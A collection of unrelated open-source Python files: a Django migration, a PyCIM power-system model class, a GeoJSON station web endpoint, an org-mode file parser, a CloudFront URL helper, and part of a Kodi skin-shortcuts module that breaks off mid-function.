Pandaaaa906/ChemErpSystem | Inquiry_manage/migrations/0002_auto_20170102_0936.py | apache-2.0

# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-02 01:36
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):

    initial = True

    dependencies = [
        ('Product_manage', '0001_initial'),
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ('Inquiry_manage', '0001_initial'),
    ]

    operations = [
        migrations.AddField(
            model_name='quotation',
            name='product',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='quotation', to='Product_manage.Product'),
        ),
        migrations.AddField(
            model_name='inquiry_item',
            name='created_by',
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_item_created', to=settings.AUTH_USER_MODEL, verbose_name='\u521b\u5efa\u4eba'),
        ),
        migrations.AddField(
            model_name='inquiry_item',
            name='handler',
            field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='handle_inquiries', to=settings.AUTH_USER_MODEL),
        ),
        migrations.AddField(
            model_name='inquiry_item',
            name='inquiry',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Inquiry_manage.Inquiry'),
        ),
        migrations.AddField(
            model_name='inquiry_item',
            name='modified_by',
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_item_modified', to=settings.AUTH_USER_MODEL, verbose_name='\u4fee\u6539\u4eba'),
        ),
        migrations.AddField(
            model_name='inquiry',
            name='created_by',
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_created', to=settings.AUTH_USER_MODEL, verbose_name='\u521b\u5efa\u4eba'),
        ),
        migrations.AddField(
            model_name='inquiry',
            name='modified_by',
            field=models.ForeignKey(blank=True, default=None, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='inquiry_manage_inquiry_modified', to=settings.AUTH_USER_MODEL, verbose_name='\u4fee\u6539\u4eba'),
        ),
        migrations.AddField(
            model_name='inquiry',
            name='sales',
            field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inquiries', to=settings.AUTH_USER_MODEL),
        ),
    ]
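
# Editor's sketch (assumption, not part of the migration): each AddField above
# implies a field on the corresponding model. For example, the first operation
# matches a hypothetical excerpt from Inquiry_manage/models.py such as:
#
#     class Quotation(models.Model):
#         product = models.ForeignKey('Product_manage.Product',
#                                     on_delete=models.CASCADE,
#                                     related_name='quotation')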

rwl/PyCIM | CIM14/ENTSOE/Dynamics/IEC61970/Dynamics/ExcitationSystems/ExcitationSystemsExcST4B.py | mit

# Copyright (C) 2010-2011 Richard Lincoln
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
from CIM14.ENTSOE.Dynamics.IEC61970.Core.CorePowerSystemResource import CorePowerSystemResource
class ExcitationSystemsExcST4B(CorePowerSystemResource):

    def __init__(self, kp=0.0, xl=0.0, vbmax=0.0, ki=0.0, kir=0.0, vrmin=0.0, vmmin=0.0, kim=0.0, ta=0.0, kg=0.0, tr=0.0, kc=0.0, vrmax=0.0, angp=0.0, kpr=0.0, vgmax=0.0, kpm=0.0, vmmax=0.0, *args, **kw_args):
        """Initialises a new 'ExcitationSystemsExcST4B' instance.

        @param kp:
        @param xl:
        @param vbmax:
        @param ki:
        @param kir:
        @param vrmin:
        @param vmmin:
        @param kim:
        @param ta:
        @param kg:
        @param tr:
        @param kc:
        @param vrmax:
        @param angp:
        @param kpr:
        @param vgmax:
        @param kpm:
        @param vmmax:
        """
        self.kp = kp
        self.xl = xl
        self.vbmax = vbmax
        self.ki = ki
        self.kir = kir
        self.vrmin = vrmin
        self.vmmin = vmmin
        self.kim = kim
        self.ta = ta
        self.kg = kg
        self.tr = tr
        self.kc = kc
        self.vrmax = vrmax
        self.angp = angp
        self.kpr = kpr
        self.vgmax = vgmax
        self.kpm = kpm
        self.vmmax = vmmax

        super(ExcitationSystemsExcST4B, self).__init__(*args, **kw_args)

    _attrs = ["kp", "xl", "vbmax", "ki", "kir", "vrmin", "vmmin", "kim", "ta", "kg", "tr", "kc", "vrmax", "angp", "kpr", "vgmax", "kpm", "vmmax"]
    _attr_types = {"kp": float, "xl": float, "vbmax": float, "ki": float, "kir": float, "vrmin": float, "vmmin": float, "kim": float, "ta": float, "kg": float, "tr": float, "kc": float, "vrmax": float, "angp": float, "kpr": float, "vgmax": float, "kpm": float, "vmmax": float}
    _defaults = {"kp": 0.0, "xl": 0.0, "vbmax": 0.0, "ki": 0.0, "kir": 0.0, "vrmin": 0.0, "vmmin": 0.0, "kim": 0.0, "ta": 0.0, "kg": 0.0, "tr": 0.0, "kc": 0.0, "vrmax": 0.0, "angp": 0.0, "kpr": 0.0, "vgmax": 0.0, "kpm": 0.0, "vmmax": 0.0}
    _enums = {}
    _refs = []
    _many_refs = []
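
# Minimal usage sketch (assumption; not part of the PyCIM source). The keyword
# arguments are the ST4B excitation-system model constants; the values below
# are placeholders only:
#
#     exc = ExcitationSystemsExcST4B(kpr=10.75, kir=10.75, kpm=1.0, kc=0.113)
#     exc.vrmax = 1.0                # attributes may also be assigned later
#     print(exc._attr_types["kp"])   # -> <type 'float'>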

akrherz/iem | htdocs/geojson/network.py | mit

"""GeoJSON of a given IEM network code"""
import json
import datetime
import psycopg2.extras
import memcache
from paste.request import parse_formvars
from pyiem.util import get_dbconn, html_escape
def run(network, only_online):
    """Generate a GeoJSON dump of the provided network"""
    pgconn = get_dbconn("mesosite")
    cursor = pgconn.cursor(cursor_factory=psycopg2.extras.DictCursor)
    # One off special
    if network == "ASOS1MIN":
        cursor.execute(
            "SELECT ST_asGeoJson(geom, 4) as geojson, t.* "
            "from stations t JOIN station_attributes a "
            "ON (t.iemid = a.iemid) WHERE t.network ~* 'ASOS' and "
            "a.attr = 'HAS1MIN' ORDER by id ASC",
        )
    else:
        online = "and online" if only_online else ""
        cursor.execute(
            "SELECT ST_asGeoJson(geom, 4) as geojson, * from stations "
            f"WHERE network = %s {online} ORDER by name ASC",
            (network,),
        )
    res = {
        "type": "FeatureCollection",
        "features": [],
        "generation_time": datetime.datetime.utcnow().strftime(
            "%Y-%m-%dT%H:%M:%SZ"
        ),
        "count": cursor.rowcount,
    }
    for row in cursor:
        ab = row["archive_begin"]
        ae = row["archive_end"]
        time_domain = "(%s-%s)" % (
            "????" if ab is None else ab.year,
            "Now" if ae is None else ae.year,
        )
        res["features"].append(
            dict(
                type="Feature",
                id=row["id"],
                properties=dict(
                    elevation=row["elevation"],
                    sname=row["name"],
                    time_domain=time_domain,
                    state=row["state"],
                    country=row["country"],
                    climate_site=row["climate_site"],
                    wfo=row["wfo"],
                    tzname=row["tzname"],
                    ncdc81=row["ncdc81"],
                    ncei91=row["ncei91"],
                    ugc_county=row["ugc_county"],
                    ugc_zone=row["ugc_zone"],
                    county=row["county"],
                    sid=row["id"],
                ),
                geometry=json.loads(row["geojson"]),
            )
        )
    return json.dumps(res)


def application(environ, start_response):
    """Main Workflow"""
    headers = [("Content-type", "application/vnd.geo+json")]
    form = parse_formvars(environ)
    cb = form.get("callback", None)
    network = form.get("network", "KCCI")
    only_online = form.get("only_online", "0") == "1"
    mckey = "/geojson/network/%s.geojson|%s" % (network, only_online)
    mc = memcache.Client(["iem-memcached:11211"], debug=0)
    res = mc.get(mckey)
    if not res:
        res = run(network, only_online)
        mc.set(mckey, res, 3600)
    if cb is None:
        data = res
    else:
        data = "%s(%s)" % (html_escape(cb), res)

    start_response("200 OK", headers)
    return [data.encode("ascii")]
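
# Local usage sketch (assumption): `application` is a standard WSGI callable,
# so it can be served with the stdlib reference server for testing:
#
#     from wsgiref.simple_server import make_server
#     make_server("", 8080, application).serve_forever()
#     # GET /?network=ASOS1MIN&callback=cb then returns JSONP-wrapped GeoJSON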

rdmnk/Orgnode | Orgnode/myorgnode.py | mit

# MIT License
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copycopy,
# modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Program written by Charles Cave ([email protected])
# February - March 2009
# Version 2 - June 2009
# Added support for all tags, TODO priority and checking existence of a tag
# More information at
# http://members.optusnet.com.au/~charles57/GTD
# Jule 2017, by Roman.Dmnk
# Added 'maketree' function.
"""
The Orgnode module consists of the Orgnode class for representing a
headline and associated text from an org-mode file, and routines for
constructing data structures of these classes.
"""
import re, sys, os.path
import datetime
import json
def toJSON(nodelist):
    return json.dumps(nodelist, default=lambda o:
                      o.isoformat() if isinstance(o, datetime.date) else o.__dict__,
                      sort_keys=True, indent=4)
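
# Usage sketch (assumption, not part of the original module): serialise parsed
# nodes; datetime.date values (scheduled/deadline dates) become ISO-8601
# strings via the `default` hook above.
#
#     nodes = makelist('inbox.org')            # defined later in this module
#     open('inbox.json', 'w').write(toJSON(nodes))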
def maketree(filename, filecontent):
    """
    Read an org-mode file and return a tree of Orgnode objects
    created from this file.
    """
    ctr = 0

    #try:
    #    f = open(filename, 'r')
    #except IOError:
    #    print "Unable to open file [%s] " % filename
    #    print "Program terminating."
    #    sys.exit(1)

    todos = dict()      # populated from #+SEQ_TODO line
    todos['TODO'] = ''  # default values
    todos['DONE'] = ''  # default values
    level = 0
    heading = ""
    bodytext = ""
    tag1 = ""           # The first tag enclosed in ::
    alltags = []        # list of all tags in headline
    sched_date = ''
    deadline_date = ''
    nodetree = []
    propdict = dict()

    parent = None
    lsib = None
    parent_list = [0, ]  # consists of (parent node_ctr)
    node_ctr = 1
    filebase = os.path.splitext(os.path.basename(filename))[0]
    thisNode = Orgnode('', filebase, "", "", "", None, None)
    nodetree.append(thisNode)

    lines = filecontent.split('\n')
    for line in lines:
        ctr += 1
        hdng = re.search('^(\*+)\s(.*?)\s*$', line)
        if hdng:
            if heading:  # we are processing a heading line
                thisNode = Orgnode(level, heading, bodytext, tag1, alltags, parent, lsib)
                if sched_date:
                    thisNode.setScheduled(sched_date)
                    sched_date = ""
                if deadline_date:
                    thisNode.setDeadline(deadline_date)
                    deadline_date = ''
                thisNode.setProperties(propdict)
                nodetree.append(thisNode)
                propdict = dict()
            level = hdng.group(1)

            try:
                lsib = parent_list[len(level)]
                nodetree[parent_list[len(level)]].rsib = node_ctr
            except IndexError:
                lsib = None
                pass
            parent_list = parent_list[:len(level)]
            parent_list.append(node_ctr)
            if len(parent_list) > 1:
                parent = parent_list[-2]
                nodetree[parent_list[-2]].childs.append(node_ctr)
            else:
                parent = None

            heading = hdng.group(2)
            bodytext = ""
            tag1 = ""
            alltags = []  # list of all tags in headline
            tagsrch = re.search('(.*?)\s*:(.*?):(.*?)$', heading)
            if tagsrch:
                heading = tagsrch.group(1)
                tag1 = tagsrch.group(2)
                alltags.append(tag1)
                tag2 = tagsrch.group(3)
                if tag2:
                    for t in tag2.split(':'):
                        if t != '': alltags.append(t)
            node_ctr = node_ctr + 1
        else:  # we are processing a non-heading line
            if line[:10] == '#+SEQ_TODO':
                kwlist = re.findall('([A-Z]+)\(', line)
                for kw in kwlist: todos[kw] = ""
            if line[:1] != '#':
                bodytext = bodytext + line
            if re.search(':PROPERTIES:', line): continue
            if re.search(':END:', line): continue
            prop_srch = re.search('^\s*:(.*?):\s*(.*?)\s*$', line)
            if prop_srch:
                propdict[prop_srch.group(1)] = prop_srch.group(2)
                continue
            sd_re = re.search('SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
            if sd_re:
                sched_date = datetime.date(int(sd_re.group(1)),
                                           int(sd_re.group(2)),
                                           int(sd_re.group(3)))
            dd_re = re.search('DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
            if dd_re:
                deadline_date = datetime.date(int(dd_re.group(1)),
                                              int(dd_re.group(2)),
                                              int(dd_re.group(3)))

    # write out last node
    thisNode = Orgnode(level, heading, bodytext, tag1, alltags, parent, lsib)
    thisNode.setProperties(propdict)
    if sched_date:
        thisNode.setScheduled(sched_date)
    if deadline_date:
        thisNode.setDeadline(deadline_date)
    nodetree.append(thisNode)

    # using the list of TODO keywords found in the file
    # process the headings searching for TODO keywords
    for n in nodetree:
        h = n.Heading()
        todoSrch = re.search('([A-Z]+)\s(.*?)$', h)
        if todoSrch:
            if todos.has_key(todoSrch.group(1)):
                n.setHeading(todoSrch.group(2))
                n.setTodo(todoSrch.group(1))
        prtysrch = re.search('^\[\#(A|B|C)\] (.*?)$', n.Heading())
        if prtysrch:
            n.setPriority(prtysrch.group(1))
            n.setHeading(prtysrch.group(2))

    return nodetree
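
# Navigation sketch (assumption): maketree() returns a flat list whose
# parent/childs/lsib/rsib fields hold list indices maintained by node_ctr:
#
#     tree = maketree('notes.org', open('notes.org').read())
#     root = tree[0]                    # synthetic root named after the file
#     first = tree[root.childs[0]]      # first top-level heading
#     print first.Heading(), first.parent, first.childs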
def makelist(filename):
    """
    Read an org-mode file and return a list of Orgnode objects
    created from this file.
    """
    ctr = 0

    try:
        f = open(filename, 'r')
    except IOError:
        print "Unable to open file [%s] " % filename
        print "Program terminating."
        sys.exit(1)

    todos = dict()      # populated from #+SEQ_TODO line
    todos['TODO'] = ''  # default values
    todos['DONE'] = ''  # default values
    level = 0
    heading = ""
    bodytext = ""
    tag1 = ""           # The first tag enclosed in ::
    alltags = []        # list of all tags in headline
    sched_date = ''
    deadline_date = ''
    nodelist = []
    propdict = dict()

    for line in f:
        ctr += 1
        hdng = re.search('^(\*+)\s(.*?)\s*$', line)
        if hdng:
            if heading:  # we are processing a heading line
                thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
                if sched_date:
                    thisNode.setScheduled(sched_date)
                    sched_date = ""
                if deadline_date:
                    thisNode.setDeadline(deadline_date)
                    deadline_date = ''
                thisNode.setProperties(propdict)
                nodelist.append(thisNode)
                propdict = dict()
            level = hdng.group(1)
            heading = hdng.group(2)
            bodytext = ""
            tag1 = ""
            alltags = []  # list of all tags in headline
            tagsrch = re.search('(.*?)\s*:(.*?):(.*?)$', heading)
            if tagsrch:
                heading = tagsrch.group(1)
                tag1 = tagsrch.group(2)
                alltags.append(tag1)
                tag2 = tagsrch.group(3)
                if tag2:
                    for t in tag2.split(':'):
                        if t != '': alltags.append(t)
        else:  # we are processing a non-heading line
            if line[:10] == '#+SEQ_TODO':
                kwlist = re.findall('([A-Z]+)\(', line)
                for kw in kwlist: todos[kw] = ""
            if line[:1] != '#':
                bodytext = bodytext + line
            if re.search(':PROPERTIES:', line): continue
            if re.search(':END:', line): continue
            prop_srch = re.search('^\s*:(.*?):\s*(.*?)\s*$', line)
            if prop_srch:
                propdict[prop_srch.group(1)] = prop_srch.group(2)
                continue
            sd_re = re.search('SCHEDULED:\s+<([0-9]+)\-([0-9]+)\-([0-9]+)', line)
            if sd_re:
                sched_date = datetime.date(int(sd_re.group(1)),
                                           int(sd_re.group(2)),
                                           int(sd_re.group(3)))
            dd_re = re.search('DEADLINE:\s*<(\d+)\-(\d+)\-(\d+)', line)
            if dd_re:
                deadline_date = datetime.date(int(dd_re.group(1)),
                                              int(dd_re.group(2)),
                                              int(dd_re.group(3)))

    # write out last node
    thisNode = Orgnode(level, heading, bodytext, tag1, alltags)
    thisNode.setProperties(propdict)
    if sched_date:
        thisNode.setScheduled(sched_date)
    if deadline_date:
        thisNode.setDeadline(deadline_date)
    nodelist.append(thisNode)

    # using the list of TODO keywords found in the file
    # process the headings searching for TODO keywords
    for n in nodelist:
        h = n.Heading()
        todoSrch = re.search('([A-Z]+)\s(.*?)$', h)
        if todoSrch:
            if todos.has_key(todoSrch.group(1)):
                n.setHeading(todoSrch.group(2))
                n.setTodo(todoSrch.group(1))
        prtysrch = re.search('^\[\#(A|B|C)\] (.*?)$', n.Heading())
        if prtysrch:
            n.setPriority(prtysrch.group(1))
            n.setHeading(prtysrch.group(2))

    return nodelist
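
# Worked example (assumption): for an org file containing
#
#     * TODO [#A] Pay rent    :HOME:
#       SCHEDULED: <2017-07-01 Sat>
#
# makelist() returns one Orgnode where Todo() == 'TODO', Priority() == 'A',
# Heading() == 'Pay rent', Tag() == 'HOME' and Scheduled() is
# datetime.date(2017, 7, 1).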
######################
class Orgnode(object):
    """
    Orgnode class represents a headline, tags and text associated
    with the headline.
    """
    def __init__(self, level, headline, body, tag, alltags, parent=None, lsib=None):
        """
        Create an Orgnode object given the parameters of level (as the
        raw asterisks), headline text (including the TODO tag), and
        first tag. The makelist routine postprocesses the list to
        identify TODO tags and updates headline and todo fields.
        """
        self.level = len(level)
        self.headline = headline
        self.body = body
        self.tag = tag           # The first tag in the list
        self.tags = dict()       # All tags in the headline
        self.todo = ""
        self.prty = ""           # empty, or A, B or C
        self.scheduled = ""      # Scheduled date
        self.deadline = ""       # Deadline date
        self.properties = dict()
        for t in alltags:
            self.tags[t] = ''

        self.childs = []
        self.parent = parent
        self.lsib = lsib
        self.rsib = None
        # Look for priority in headline and transfer to prty field

    def Heading(self):
        """
        Return the Heading text of the node without the TODO tag
        """
        return self.headline

    def setHeading(self, newhdng):
        """
        Change the heading to the supplied string
        """
        self.headline = newhdng

    def Body(self):
        """
        Returns all lines of text of the body of this node except the
        Property Drawer
        """
        return self.body

    def Level(self):
        """
        Returns an integer corresponding to the level of the node.
        Top level (one asterisk) has a level of 1.
        """
        return self.level

    def Priority(self):
        """
        Returns the priority of this headline: 'A', 'B', 'C' or empty
        string if priority has not been set.
        """
        return self.prty

    def setPriority(self, newprty):
        """
        Change the value of the priority of this headline.
        Valid values are '', 'A', 'B', 'C'
        """
        self.prty = newprty

    def Tag(self):
        """
        Returns the value of the first tag.
        For example, :HOME:COMPUTER: would return HOME
        """
        return self.tag

    def Tags(self):
        """
        Returns a list of all tags
        For example, :HOME:COMPUTER: would return ['HOME', 'COMPUTER']
        """
        return self.tags.keys()

    def hasTag(self, srch):
        """
        Returns True if the supplied tag is present in this headline
        For example, hasTag('COMPUTER') on a headline containing
        :HOME:COMPUTER: would return True.
        """
        return self.tags.has_key(srch)

    def setTag(self, newtag):
        """
        Change the value of the first tag to the supplied string
        """
        self.tag = newtag

    def setTags(self, taglist):
        """
        Store all the tags found in the headline. The first tag will
        also be stored as if the setTag method was called.
        """
        for t in taglist:
            self.tags[t] = ''

    def Todo(self):
        """
        Return the value of the TODO tag
        """
        return self.todo

    def setTodo(self, value):
        """
        Set the value of the TODO tag to the supplied string
        """
        self.todo = value

    def setProperties(self, dictval):
        """
        Sets all properties using the supplied dictionary of
        name/value pairs
        """
        self.properties = dictval

    def Property(self, keyval):
        """
        Returns the value of the requested property or null if the
        property does not exist.
        """
        return self.properties.get(keyval, "")

    def setScheduled(self, dateval):
        """
        Set the scheduled date using the supplied date object
        """
        self.scheduled = dateval

    def Scheduled(self):
        """
        Return the scheduled date object or null if nonexistent
        """
        return self.scheduled

    def setDeadline(self, dateval):
        """
        Set the deadline (due) date using the supplied date object
        """
        self.deadline = dateval

    def Deadline(self):
        """
        Return the deadline date object or null if nonexistent
        """
        return self.deadline

    def __repr__(self):
        """
        Print the level, heading text and tag of a node and the body
        text as used to construct the node.
        """
        # This method is not completed yet.
        n = ''
        for i in range(0, self.level):
            n = n + '*'
        n = n + ' ' + self.todo + ' '
        if self.prty:
            n = n + '[#' + self.prty + '] '
        n = n + self.headline
        n = "%-60s " % n  # hack - tags will start in column 62
        closecolon = ''
        for t in self.tags.keys():
            n = n + ':' + t
            closecolon = ':'
        n = n + closecolon
        # Need to output Scheduled Date, Deadline Date, property tags. The
        # following will output the text used to construct the object
        n = n + "\n" + self.body
        return n
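
# Property-drawer sketch (assumption): values stored with setProperties() are
# read back with Property(), which falls back to an empty string:
#
#     node.setProperties({'Effort': '0:30'})
#     node.Property('Effort')     # -> '0:30'
#     node.Property('Missing')    # -> ''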
def jointrees(name, args):
    parent_list = [0, ]
    nodetree = list()
    node_ctr = 1
    thisNode = Orgnode('', name, "", "", "", None, None)
    nodetree.append(thisNode)

    for nt in args:
        # for item #0
        nt[0].level = nt[0].level + 1
        try:
            nt[0].lsib = parent_list[nt[0].level]
            nodetree[parent_list[nt[0].level]].rsib = node_ctr
        except IndexError:
            lsib = None
            pass
        parent_list = parent_list[:nt[0].level]
        parent_list.append(node_ctr)
        if len(parent_list) > 1:
            nt[0].parent = parent_list[-2]
            nodetree[parent_list[-2]].childs.append(node_ctr)
        else:
            parent = None
        nodetree.append(nt[0])

        # for other items: shift stored indices by this subtree's offset
        for item in nt[1:]:
            item.level = item.level + 1
            if item.parent:
                item.parent = node_ctr + item.parent
            if item.lsib:
                item.lsib = node_ctr + item.lsib
            if item.rsib:
                item.rsib = node_ctr + item.rsib
            nodetree.append(item)
        node_ctr = node_ctr + len(nt)

    return nodetree

fusic-com/flask-todo | config/cdn.py | mit

import json
from urlobject import URLObject
from boto import connect_cloudfront
from . import settings
from . import paths
CACHE_FILE=paths.CACHE/'cdn.json'
def get_cache(force_rebuild=False):
    if not settings.AWS_ACCESS_KEY_ID:
        return {}
    if force_rebuild or not hasattr(get_cache, 'cache'):
        if force_rebuild or not CACHE_FILE.exists():
            CACHE_FILE.dirname().makedirs_p()
            connection = connect_cloudfront(settings.AWS_ACCESS_KEY_ID, settings.AWS_SECRET_ACCESS_KEY)
            distributions = connection.get_all_distributions()
            cache = {distribution.origin.dns_name: distribution.domain_name for distribution in distributions}
            with open(CACHE_FILE, 'w') as handle:
                json.dump(cache, handle)
        else:
            with open(CACHE_FILE) as handle:
                cache = json.load(handle)
        get_cache.cache = cache
    return get_cache.cache
def proxied(url):
    url = URLObject(url)
    netloc = url.netloc or settings.SERVER_NAME
    cache = get_cache()
    if netloc not in cache:
        return url
    return url.with_netloc(cache[netloc])
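
# Usage sketch (assumption): rewrite an asset URL onto its CloudFront domain
# when a distribution's origin DNS name matches the URL's host; otherwise the
# URL is returned unchanged. The hostnames below are illustrative:
#
#     proxied('http://assets.example.com/css/app.css')
#     # -> 'http://d1234abcd.cloudfront.net/css/app.css' if cached, else as-is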

AMOboxTV/AMOBox.LegoBuild | script.skinshortcuts/resources/lib/xmlfunctions.py | gpl-2.0

# coding=utf-8
import os, sys, datetime, unicodedata, re
import xbmc, xbmcgui, xbmcvfs, xbmcaddon
import xml.etree.ElementTree as xmltree
from xml.sax.saxutils import escape as escapeXML
import ast
from traceback import print_exc
from unicodeutils import try_decode
if sys.version_info < (2, 7):
    import simplejson
else:
    import json as simplejson
__addon__ = xbmcaddon.Addon()
__addonid__ = sys.modules[ "__main__" ].__addonid__
__addonversion__ = __addon__.getAddonInfo('version')
__xbmcversion__ = xbmc.getInfoLabel( "System.BuildVersion" ).split(".")[0]
__datapath__ = os.path.join( xbmc.translatePath( "special://profile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__masterpath__ = os.path.join( xbmc.translatePath( "special://masterprofile/addon_data/" ).decode('utf-8'), __addonid__ ).encode('utf-8')
__skin__ = xbmc.translatePath( "special://skin/" )
__language__ = __addon__.getLocalizedString
import datafunctions, template
DATA = datafunctions.DataFunctions()
import hashlib, hashlist
def log(txt):
    if __addon__.getSetting( "enable_logging" ) == "true":
        if isinstance(txt, str):
            txt = txt.decode('utf-8')
        message = u'%s: %s' % (__addonid__, txt)
        xbmc.log(msg=message.encode('utf-8'), level=xbmc.LOGDEBUG)
class XMLFunctions():
    def __init__(self):
        self.MAINWIDGET = {}
        self.MAINBACKGROUND = {}
        self.MAINPROPERTIES = {}
        self.hasSettings = False
        self.widgetCount = 1

        self.loadedPropertyPatterns = False
        self.propertyPatterns = None

        self.skinDir = xbmc.translatePath( "special://skin" )

        self.checkForShortcuts = []
    def buildMenu( self, mainmenuID, groups, numLevels, buildMode, options, minitems, weEnabledSystemDebug = False, weEnabledScriptDebug = False ):
        # Entry point for building includes.xml files
        if xbmcgui.Window( 10000 ).getProperty( "skinshortcuts-isrunning" ) == "True":
            return
        xbmcgui.Window( 10000 ).setProperty( "skinshortcuts-isrunning", "True" )

        # Get a list of profiles
        fav_file = xbmc.translatePath( 'special://userdata/profiles.xml' ).decode("utf-8")
        tree = None
        if xbmcvfs.exists( fav_file ):
            f = xbmcvfs.File( fav_file )
            tree = xmltree.fromstring( f.read() )

        profilelist = []
        if tree is not None:
            profiles = tree.findall( "profile" )
            for profile in profiles:
                name = profile.find( "name" ).text.encode( "utf-8" )
                dir = profile.find( "directory" ).text.encode( "utf-8" )
                log( "Profile found: " + name + " (" + dir + ")" )
                # Localise the directory
                if "://" in dir:
                    dir = xbmc.translatePath( dir ).decode( "utf-8" )
                else:
                    # Base it off of the master profile
                    dir = xbmc.translatePath( os.path.join( "special://masterprofile", dir ) ).decode( "utf-8" )
                profilelist.append( [ dir, "StringCompare(System.ProfileName," + name.decode( "utf-8" ) + ")", name.decode( "utf-8" ) ] )
        else:
            profilelist = [["special://masterprofile", None]]

        if self.shouldwerun( profilelist ) == False:
            log( "Menu is up to date" )
            xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
            return

        progress = None

        # Create a progress dialog
        progress = xbmcgui.DialogProgressBG()
        progress.create(__addon__.getAddonInfo( "name" ), __language__( 32049 ) )
        progress.update( 0 )

        # Write the menus
        try:
            self.writexml( profilelist, mainmenuID, groups, numLevels, buildMode, progress, options, minitems )
            complete = True
        except:
            log( "Failed to write menu" )
            print_exc()
            complete = False

        # Mark that we're no longer running, clear the progress dialog
        xbmcgui.Window( 10000 ).clearProperty( "skinshortcuts-isrunning" )
        progress.close()

        if complete == True:
            # Menu is built, reload the skin
            xbmc.executebuiltin( "XBMC.ReloadSkin()" )
        else:
            # Menu couldn't be built - generate a debug log

            # If we enabled debug logging
            if weEnabledSystemDebug or weEnabledScriptDebug:
                # Disable any logging we enabled
                if weEnabledSystemDebug:
                    json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":false} } ' )
                if weEnabledScriptDebug:
                    __addon__.setSetting( "enable_logging", "false" )

                # Offer to upload a debug log
                if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
                    ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
                    if ret:
                        xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
                else:
                    xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
            else:
                # Enable any debug logging needed
                json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method": "Settings.getSettings" }')
                json_query = unicode(json_query, 'utf-8', errors='ignore')
                json_response = simplejson.loads(json_query)

                enabledSystemDebug = False
                enabledScriptDebug = False
                if json_response.has_key('result') and json_response['result'].has_key('settings') and json_response['result']['settings'] is not None:
                    for item in json_response['result']['settings']:
                        if item["id"] == "debug.showloginfo":
                            if item["value"] == False:
                                json_query = xbmc.executeJSONRPC('{ "jsonrpc": "2.0", "id": 0, "method":"Settings.setSettingValue", "params": {"setting":"debug.showloginfo", "value":true} } ' )
                                enabledSystemDebug = True

                if __addon__.getSetting( "enable_logging" ) != "true":
                    __addon__.setSetting( "enable_logging", "true" )
                    enabledScriptDebug = True

                if enabledSystemDebug or enabledScriptDebug:
                    # We enabled one or more of the debug options, re-run this function
                    self.buildMenu( mainmenuID, groups, numLevels, buildMode, options, minitems, enabledSystemDebug, enabledScriptDebug )
                else:
                    # Offer to upload a debug log
                    if xbmc.getCondVisibility( "System.HasAddon( script.xbmc.debug.log )" ):
                        ret = xbmcgui.Dialog().yesno( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32093 ) )
                        if ret:
                            xbmc.executebuiltin( "RunScript(script.xbmc.debug.log)" )
                    else:
                        xbmcgui.Dialog().ok( __addon__.getAddonInfo( "name" ), __language__( 32092 ), __language__( 32094 ) )
    def shouldwerun( self, profilelist ):
        try:
